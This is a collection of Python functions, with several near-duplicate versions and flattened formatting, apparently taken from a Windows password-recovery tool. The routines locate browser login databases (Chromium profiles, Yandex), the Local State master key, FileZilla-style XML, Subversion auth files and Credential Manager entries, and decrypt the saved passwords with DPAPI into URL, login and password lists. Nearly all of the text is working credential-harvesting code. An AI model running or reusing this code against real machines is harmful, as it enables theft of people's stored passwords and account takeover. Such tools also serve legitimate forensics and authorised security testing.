def _export_credentials(self, db_path): """ Export credentials from the given database :param unicode db_path: database path :return: list of credentials :rtype: tuple """ credentials = [] try: conn = sqlite3.connect(db_path) cursor = conn.cursor() cursor.execute(self.database_query) except Exception as e: print_debug('DEBUG', str(e)) print_debug('ERROR', u'An error occurred while opening the database file') return credentials for url, login, password in cursor.fetchall(): try: # Decrypt the Password password = Win32CryptUnprotectData(password) credentials.append((url, login, password)) except Exception: print_debug('DEBUG', traceback.format_exc()) conn.close() return credentials
def _export_credentials(self, db_path): """ Export credentials from the given database :param unicode db_path: database path :return: list of credentials :rtype: tuple """ credentials = [] try: conn = sqlite3.connect(db_path) cursor = conn.cursor() cursor.execute(self.database_query) except Exception as e: self.debug(str(e)) return credentials for url, login, password in cursor.fetchall(): try: # Decrypt the Password password = Win32CryptUnprotectData( password, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) credentials.append((url, login, password)) except Exception: self.debug(traceback.format_exc()) conn.close() return credentials
def run(self): xml_file = self.get_application_path() if xml_file and os.path.exists(xml_file): tree = ElementTree(file=xml_file) pwd_found = [] for elem in tree.iter(): try: if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') \ or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') \ or elem.attrib['name'].startswith('https'): encrypted_password = base64.b64decode( elem.attrib['value']) password = Win32CryptUnprotectData( encrypted_password, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) pwd_found.append({ 'URL': elem.attrib['name'], 'Password': password, }) except Exception as e: self.debug(str(e)) return pwd_found
def decrypt_password(self, encrypted_password, entropy): result_bytes = Win32CryptUnprotectData( encrypted_password, entropy=entropy, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) return result_bytes.decode("utf-8")
def decrypt_password(self, encrypted_password): try: decoded = base64.b64decode(encrypted_password) password_decrypted = Win32CryptUnprotectData(decoded, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) password_decrypted = password_decrypted.replace('\x00', '') except Exception: password_decrypted = encrypted_password.replace('\x00', '') return password_decrypted
def decrypt_password(self, encrypted_password): try: decoded = base64.b64decode(encrypted_password) password_decrypted = Win32CryptUnprotectData(decoded) password_decrypted = password_decrypted.replace('\x00', '') except Exception: password_decrypted = encrypted_password.replace('\x00', '') return password_decrypted
def run(self): pwd_found = [] path = os.path.join(constant.profile["APPDATA"], u'Subversion\\auth\\svn.simple') if os.path.exists(path): for root, dirs, files in os.walk(path + os.sep): for filename in files: f = open(os.path.join(path, filename), 'r') url = '' username = '' result = '' i = 0 # password for line in f: if i == -1: result = line.replace('\n', '') break if line.startswith('password'): i = -3 i += 1 i = 0 # url for line in f: if i == -1: url = line.replace('\n', '') break if line.startswith('svn:realmstring'): i = -3 i += 1 i = 0 # username for line in f: if i == -1: username = line.replace('\n', '') break if line.startswith('username'): i = -3 i += 1 # encrypted the password if result: try: password = Win32CryptUnprotectData( base64.b64decode(result), is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) pwd_found.append({ 'URL': url, 'Login': username, 'Password': str(password) }) except Exception: pass return pwd_found
def _get_database_dirs(self, db_filenames=[]): """ Return database directories for all profiles within all paths """ databases = set() for path in [p.format(**constant.profile) for p in self.paths]: profiles_path = os.path.join(path, u'Local State') if os.path.exists(profiles_path): master_key = None # List all users profile (empty string means current dir, without a profile) profiles = {'Default', ''} # Automatic join all other additional profiles for dirs in os.listdir(path): dirs_path = os.path.join(path, dirs) if os.path.isdir(dirs_path) and dirs.startswith('Profile'): profiles.add(dirs) with open(profiles_path) as f: try: data = json.load(f) # Add profiles from json to Default profile. set removes duplicates profiles |= set(data['profile']['info_cache']) except Exception: pass with open(profiles_path) as f: try: master_key = base64.b64decode( json.load(f)["os_crypt"]["encrypted_key"]) master_key = master_key[5:] # removing DPAPI master_key = Win32CryptUnprotectData( master_key, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) except Exception as e: master_key = None # Each profile has its own password database db_filenames = db_filenames or [ 'login data', 'ya passman data' ] for profile in profiles: # Some browsers use names other than "Login Data" # Like YandexBrowser - "Ya Login Data", UC Browser - "UC Login Data.18" try: db_files = os.listdir(os.path.join(path, profile)) except Exception: continue for db in db_files: if db.lower() in db_filenames: databases.add((os.path.join(path, profile, db), master_key)) return databases
def _export_credentials(self, db_path, is_yandex=False, master_key=None): """ Export credentials from the given database :param unicode db_path: database path :return: list of credentials :rtype: tuple """ credentials = [] yandex_enckey = None if is_yandex: try: credman_passwords = Credman().run() for credman_password in credman_passwords: if b'Yandex' in credman_password.get('URL', b''): if credman_password.get('Password'): yandex_enckey = credman_password.get('Password') self.info('EncKey found: {encKey}'.format( encKey=repr(yandex_enckey))) except Exception: self.debug(traceback.format_exc()) # Passwords could not be decrypted without encKey self.info('EncKey has not been retrieved') return [] try: conn = sqlite3.connect(db_path) cursor = conn.cursor() cursor.execute(self.database_query) except Exception: self.debug(traceback.format_exc()) return credentials for url, login, password in cursor.fetchall(): try: # Yandex passwords use a masterkey stored on windows credential manager # https://yandex.com/support/browser-passwords-crypto/without-master.html if is_yandex and yandex_enckey: try: try: p = json.loads(str(password)) except Exception: p = json.loads(password) password = base64.b64decode(p['p']) except Exception: # New version does not use json format pass # Passwords are stored using AES-256-GCM algorithm # The key used to encrypt is stored on the credential manager # yandex_enckey: # - 4 bytes should be removed to be 256 bits # - these 4 bytes correspond to the nonce ? # cipher = AES.new(yandex_enckey, AES.MODE_GCM) # plaintext = cipher.decrypt(password) # Failed... else: # Decrypt the Password try: password_bytes = Win32CryptUnprotectData( password, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) except AttributeError: try: password_bytes = Win32CryptUnprotectData( password, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) except: password_bytes = None if password_bytes is not None: password = password_bytes.decode("utf-8") elif master_key: password = self._decrypt_v80(password, master_key) if not url and not login and not password: continue credentials.append((url, login, password)) except Exception: self.debug(traceback.format_exc()) conn.close() return credentials
def decrypt_password(self, encrypted_password, entropy): return Win32CryptUnprotectData( encrypted_password, entropy=entropy, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
def _export_credentials(self, db_path, is_yandex=False): """ Export credentials from the given database :param unicode db_path: database path :return: list of credentials :rtype: tuple """ credentials = [] yandex_enckey = None if is_yandex: try: credman_passwords = Credman().run() for credman_password in credman_passwords: if b'Yandex' in credman_password.get('URL', b''): if credman_password.get('Password'): yandex_enckey = credman_password.get('Password') self.info('EncKey found: {encKey}'.format( encKey=repr(yandex_enckey))) except Exception: self.debug(traceback.format_exc()) # Passwords could not be decrypted without encKey self.info('EncKey has not been retrieved') return [] try: conn = sqlite3.connect(db_path) cursor = conn.cursor() cursor.execute(self.database_query) except Exception: self.debug(traceback.format_exc()) return credentials for url, login, password in cursor.fetchall(): try: # Yandex passwords use a masterkey stored on windows credential manager # https://yandex.com/support/browser-passwords-crypto/without-master.html if is_yandex and yandex_enckey: try: p = json.loads(str(password)) except Exception: p = json.loads(password) password = base64.b64decode(p['p']) # Passwords are stored using AES-256-GCM algorithm # The key used to encrypt is stored on the credential manager # from cryptography.hazmat.primitives.ciphers.aead import AESGCM # aesgcm = AESGCM(yandex_enckey) # Failed... else: # Decrypt the Password password = Win32CryptUnprotectData( password, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) if not url and not login and not password: continue credentials.append((url, login, password)) except Exception: self.debug(traceback.format_exc()) conn.close() return credentials